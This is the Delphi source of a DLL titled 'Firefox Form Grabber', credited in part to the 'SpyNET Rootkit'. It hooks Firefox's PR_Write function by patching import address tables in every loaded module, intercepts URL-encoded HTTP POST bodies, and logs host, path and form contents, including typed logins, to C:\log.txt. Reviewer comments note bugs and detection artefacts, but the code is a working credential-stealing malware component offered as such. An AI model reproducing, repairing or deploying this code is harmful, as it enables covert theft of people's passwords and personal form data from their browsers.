library prjDll;
{
Title: Firefox Form Grabber
Coder: Slayer616
Description: This DLL hooks PR_Write through the import address table and captures the body of HTTP requests sent with "POST"
whose Content-Type is application/x-www-form-urlencoded. The Host, request path and body are appended to C:\log.txt!
Credits: Hamtaro, Aphex(some Functions taken from "SpyNET Rootkit")
}
uses
sharemem,windows,sysutils;
var
// Text file handle for the capture log. It is a single global: newpr_write assigns, appends to and
// closes it per logged request, so concurrent callers of the hook share (and can interleave on) it.
t:textfile;
// Trampoline to the original PR_Write; filled in by HookAPI through its var OldProc parameter.
// Signature and cdecl convention mirror NSPR's PR_Write so the hook can forward to it.
oldpr_write : function(PRFileDesc : Pointer;buf : Pointer; amount : LongInt) : LongInt; cdecl;
type
// Dense list of module base addresses. Everything in this file assumes a 32-bit process
// (pointers are cast to dword/cardinal throughout).
TModuleList = array of cardinal;
// Shape of an x86 import thunk stub: bytes FF 25 <imm32> = "jmp dword ptr [imm32]".
// FunctionAddress uses it to look through such a stub to the pointer slot it jumps via.
TImportFunction = packed record
JumpInstruction: Word;
AddressOfPointerToFunction: ^Pointer;
end;
// Hand-rolled IMAGE_IMPORT_DESCRIPTOR (20 bytes). The field names do not follow the PE spec:
// MajorVersion+MinorVersion together occupy the ForwarderChain slot, and LookupTable sits at the
// offset of FirstThunk, i.e. the RVA of the import address table that HookModules patches at runtime.
// Characteristics (OriginalFirstThunk in the spec) is never read here.
TImageImportEntry = record
Characteristics: dword;
TimeDateStamp: dword;
MajorVersion: word;
MinorVersion: word;
Name: dword;
LookupTable: dword;
end;
// Resolve an import stub to the address it jumps through. On x86 an import thunk is
// "FF 25 imm32" = jmp dword ptr [imm32]; if Code begins with that opcode the pointer stored at
// imm32 is returned, otherwise Code is taken to be the real address already and returned as-is.
//   Code: address obtained from GetProcAddress or a call site.
// Reads two bytes (and possibly one pointer) at Code; there is no check that Code is readable.
function FunctionAddress(Code: Pointer): Pointer;stdcall;
var
  Stub: ^TImportFunction;
begin
  Stub := Code;
  if Stub^.JumpInstruction = $25FF then
    // Little-endian: the bytes FF 25 read back as the word $25FF.
    Result := Stub^.AddressOfPointerToFunction^
  else
    Result := Code;
end;
// Patch every IAT slot in the module loaded at ImageDosHeader that currently holds TargetAddress
// so that it holds NewAddress instead (import-address-table hooking: the importing code is not
// modified, only the pointer it calls through is swapped).
//   ImageDosHeader: base address of a loaded module (from GetModuleList).
//   TargetAddress:  address to look for in the IAT (the GetProcAddress result for the hooked API).
//   NewAddress:     replacement written into every matching slot.
//   OldAddress:     receives TargetAddress with any jmp-thunk resolved (see FunctionAddress). It is
//                   assigned before any validation, so it is written even for modules that are skipped.
// Returns 0 unconditionally: Result is never assigned after the initial 0, so the caller cannot
// tell whether any slot was actually patched.
// NOTE(review): once this has run, the IAT slot points outside the module named in the import
// descriptor; comparing IAT entries against the exporting module's address range is the usual way
// to detect this class of hook.
function HookModules(ImageDosHeader: PImageDosHeader; TargetAddress, NewAddress: Pointer; var OldAddress: Pointer):integer;stdcall;
var
ImageNTHeaders : PImageNtHeaders;
ImageImportEntry: ^TImageImportEntry;
ImportCode: ^Pointer;
OldProtect: dword;
EndofImports: dword;
begin
Result := 0;
OldAddress := FunctionAddress(TargetAddress);
// Reject anything that is not an MZ image.
if ImageDosHeader.e_magic <> IMAGE_DOS_SIGNATURE then Exit;
// PE header lives at base + e_lfanew (note the stray ';;'). The NT signature ("PE\0\0") is not
// verified, and the nil test below can never fire because base + e_lfanew is nonzero for any real module.
ImageNTHeaders := Pointer(integer(ImageDosHeader) + ImageDosHeader._lfanew);;
if ImageNTHeaders <> nil then
begin
// Import directory: RVA and size of the IMAGE_IMPORT_DESCRIPTOR array.
with ImageNTHeaders^.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT] do
begin
ImageImportEntry := Pointer(dword(ImageDosHeader) + VirtualAddress);
EndofImports := VirtualAddress + Size;
end;
// Also never nil: a module with no import directory (VirtualAddress = 0) makes ImageImportEntry
// alias the DOS header. Nothing checks for that case; the EndofImports bound below presumably
// stops the walk early, but that is not guaranteed.
if ImageImportEntry <> nil then
begin
// One descriptor per imported DLL; the array is terminated by an all-zero entry.
while ImageImportEntry^.Name <> 0 do
begin
// Assumes the IAT (FirstThunk) lies within the import directory's extent. The PE format does not
// guarantee that; a module whose IAT is placed elsewhere is silently skipped. TODO confirm on real binaries.
if ImageImportEntry^.LookUpTable > EndofImports then break;
if ImageImportEntry^.LookUpTable <> 0 then
begin
// LookUpTable is the FirstThunk RVA (see TImageImportEntry): the runtime IAT, a nil-terminated pointer array.
ImportCode := Pointer(dword(ImageDosHeader) + ImageImportEntry^.LookUpTable);
while ImportCode^ <> nil do
begin
// Make the 4-byte (32-bit) slot writable and overwrite it. OldProtect is captured but never
// restored, so the page stays PAGE_EXECUTE_READWRITE afterwards — a lasting artefact a memory
// scanner can pick up.
if (ImportCode^ = TargetAddress) and VirtualProtect(ImportCode, 4, PAGE_EXECUTE_READWRITE, @OldProtect) then ImportCode^ := NewAddress;
Inc(ImportCode);
end;
end;
Inc(ImageImportEntry);
end;
end;
end;
end;
// Enumerate the base addresses of every module mapped into the current process by walking the
// address space with VirtualQueryEx (instead of the toolhelp/psapi enumeration APIs).
// A region is taken as a module when it is committed, starts its own allocation
// (BaseAddress = AllocationBase), differs from the allocation just recorded, and GetModuleFileName
// accepts its base as an HMODULE (i.e. the loader knows about it). The result buffer grows
// geometrically and is trimmed to the final count before returning.
function GetModuleList: TModuleList; stdcall;
var
  Cursor, LastBase: Pointer;
  Count: Integer;
  NameBuf: array [0..MAX_PATH] of char;
  Info: TMemoryBasicInformation;
  IsModuleStart: Boolean;
begin
  SetLength(Result, 10);
  Count := 0;
  Cursor := nil;
  LastBase := nil;
  // VirtualQueryEx returns 0 once Cursor leaves the queryable (user) address space; that ends the walk.
  while VirtualQueryEx(GetCurrentProcess, Cursor, Info, SizeOf(Info)) = SizeOf(Info) do
  begin
    // Short-circuit 'and': GetModuleFileName is only consulted for committed allocation starts.
    IsModuleStart := (Info.State = MEM_COMMIT)
      and (Info.AllocationBase <> LastBase)
      and (Info.AllocationBase = Info.BaseAddress)
      and (GetModuleFileName(dword(Info.AllocationBase), NameBuf, MAX_PATH) > 0);
    if IsModuleStart then
    begin
      // Double the buffer when it is full.
      if Count = Length(Result) then SetLength(Result, Count * 2);
      Result[Count] := dword(Info.AllocationBase);
      Inc(Count);
    end;
    LastBase := Info.AllocationBase;
    // Step to the first byte after this region.
    Cursor := Pointer(dword(Cursor) + Info.RegionSize);
  end;
  SetLength(Result, Count);
end;
// Install NewProc in place of TargetModule!TargetProc in the IAT of every module currently loaded
// in this process, returning the original address through OldProc (thunk-resolved, see FunctionAddress).
//   TargetModule, TargetProc: DLL name and export name as GetModuleHandle/GetProcAddress expect them.
//   NewProc:                  replacement address.
//   OldProc:                  receives the address being replaced.
// Returns 0: HookModules never yields anything else, so the value carries no information.
// NOTE(review): GetModuleList is captured before the LoadLibrary fallback, so if TargetModule was
// not yet loaded, the freshly loaded module (and anything it pulled in) is absent from the list
// walked below. The LoadLibrary result is not checked; a 0 handle just makes GetProcAddress return
// nil and the function Exit.
function HookAPI(TargetModule, TargetProc:Pchar; NewProc: Pointer; var OldProc: Pointer): integer; stdcall;
var
ModuleLoop: integer;
Modules: TModuleList;
Module: hModule;
Target: pointer;
begin
Result := 0;
Module := GetModuleHandle(pchar(TargetModule));
Modules := GetModuleList;
if Module = 0 then
begin
Module := LoadLibrary(pchar(TargetModule));
end;
Target := GetProcAddress(Module, pchar(TargetProc));
if Target = nil then Exit;
for ModuleLoop := 0 to High(Modules) do
begin
// Pascal precedence makes this (GetVersion and $80000000) = 0. Bit 31 set means Win9x, where
// modules mapped at or above $80000000 are skipped (presumably to leave the shared system arena
// alone); on NT the bit is clear and every listed module is processed.
if (GetVersion and $80000000 = 0) or (Modules[ModuleLoop] < $80000000) then
begin
// Only the last module's (always 0) result survives.
Result := HookModules(Pointer(Modules[ModuleLoop]), Target, NewProc, OldProc);
end;
end;
end;
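// Return the text strictly between the first occurrence of Start and the first occurrence of Stop
// that follows it. Used to pull individual header values out of a raw HTTP request.
//   Start, Stop: delimiters (matched case-sensitively, as Pos does). An empty Start means
//                "from the beginning of ToSplit".
//   ToSplit:     the haystack.
// Returns '' when Start is absent, or when Stop does not occur after Start.
// Fix: the previous version ignored a missing Start (Pos = 0) and copied from position
// Length(Start), returning unrelated bytes from near the start of the haystack; it also used
// Copy(..., 0, ...), which only worked because Copy treats index 0 as 1.
function SplitString(Start, Stop, ToSplit : String) : String;
var
  StartAt, StopAt: Integer;
  Tail: String;
begin
  Result := '';
  if Start = '' then
    StartAt := 1
  else
  begin
    StartAt := Pos(Start, ToSplit);
    if StartAt = 0 then Exit;
  end;
  // Everything after the Start delimiter; Copy clamps the count to what is available.
  Tail := Copy(ToSplit, StartAt + Length(Start), MaxInt);
  StopAt := Pos(Stop, Tail);
  // StopAt = 0 (Stop absent) or 1 (Stop immediately follows Start) both yield ''.
  if StopAt > 1 then Result := Copy(Tail, 1, StopAt - 1);
end;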
// Case-insensitive equality of two strings using the Win32 lstrcmpi (locale-aware ANSI compare).
// Both arguments are handed over as PChar, so the comparison stops at the first embedded #0.
function StrCmp(String1, String2: string): boolean;
begin
  Result := lstrcmpi(pchar(String1), pchar(String2)) = 0;
end;
// Replacement for NSPR's PR_Write (cdecl, same signature). Forwards to the original first, then
// inspects the same buffer and appends URL-encoded POST bodies to C:\log.txt.
//   PRFileDesc: opaque NSPR descriptor, forwarded untouched.
//   buf/amount: the bytes the caller is sending.
// Returns whatever the original PR_Write returned.
// NOTE(review): this sits on the host's network write path and has several defects (buffer leaks,
// unterminated PChar buffers, an unguarded StrToInt, pointer arithmetic that can leave buf); see the
// inline notes. They make the hook a stability/crash indicator rather than a transparent one.
function newpr_write(PRFileDesc : Pointer; buf : Pointer; amount : LongInt) : LongInt; cdecl;
var
dBuff,lBuff: PChar;
sTemp, sContent, sHost, sSite: String;
sLength: Integer;
begin
// Real write first; result is the byte count the original reported (negative on failure).
result := oldpr_write(PRFileDesc, buf, amount);
if (result < 2) Then exit;
//MOAR Memory
// NOTE(review): neither buffer is ever FreeMem'd — every call that gets past the guard above leaks
// amount + 4 bytes, on the early exits below as well as on the normal path.
GetMem(dBuff, amount);
GetMem(lBuff, 4);
//Now Move the Buffer to our String
CopyMemory(dBuff, buf, amount);
// NOTE(review): copies 4 bytes even though the guard only requires result >= 2, and neither dBuff
// nor lBuff is NUL-terminated, so every PChar use below (strcmp, SplitString) scans past the copied
// bytes until it happens to hit a zero.
CopyMemory(lBuff, pchar(dBuff),4);
//Only POST if usefull for us
if strcmp(lBuff, 'POST') then begin
//Extract usefull Infos
sHost := SplitString('Host: ',#13#10,dBuff);
sSite := SplitString('POST ', ' HTTP',dBuff);
// NOTE(review): StrToInt raises EConvertError when Content-Length is missing or malformed; there is
// no try/except, so the exception propagates out of PR_Write into the host process.
sLength := StrToInt(SplitString('Content-Length: ',#13#10,dBuff));
if sLength = 0 then exit;
sTemp := Trim(SplitString('Content-Type: ',#13#10,dBuff));
// Only classic form posts are logged; multipart, JSON and other bodies are ignored.
if Pos('application/x-www-form-urlencoded', sTemp) = 0 Then exit;
// The body is assumed to be the last sLength bytes of this very write. If headers and body arrive
// in separate PR_Write calls, or sLength > result, this pointer lands before or outside buf.
SetString(sContent,pchar(cardinal(buf) + result - sLength),sLength);
//Write Infos to File
// Fixed path, shared global handle: Append requires the file to already exist and raises an I/O
// error otherwise, and two threads reaching this path concurrently interleave on the same t.
assignfile(t,'C:\log.txt');
append(t);
writeln(t,'Host: ' + sHost);
writeln(t,'Site: ' + sSite);
writeln(t,'Length: ' + inttostr(sLength));
writeln(t,'Content: ' + sContent);
writeln(t,'-----------------------------------------------');
flush(t);
CloseFile(t);
end;
end;
// Library initialization: runs when the DLL is mapped into a process. Installs the IAT hook for
// nspr4.dll!PR_Write in every module currently loaded, storing the original in oldpr_write.
// The return value is ignored (and is always 0 anyway, see HookModules).
// NOTE(review): there is no finalization or unhook path, so unloading this DLL would leave IAT slots
// pointing at unmapped memory. Whether a current Firefox build still ships a separate nspr4.dll is
// not something this file establishes — confirm against the target.
begin
hookapi('nspr4.dll','PR_Write',@newPR_Write,@oldPR_Write);
end.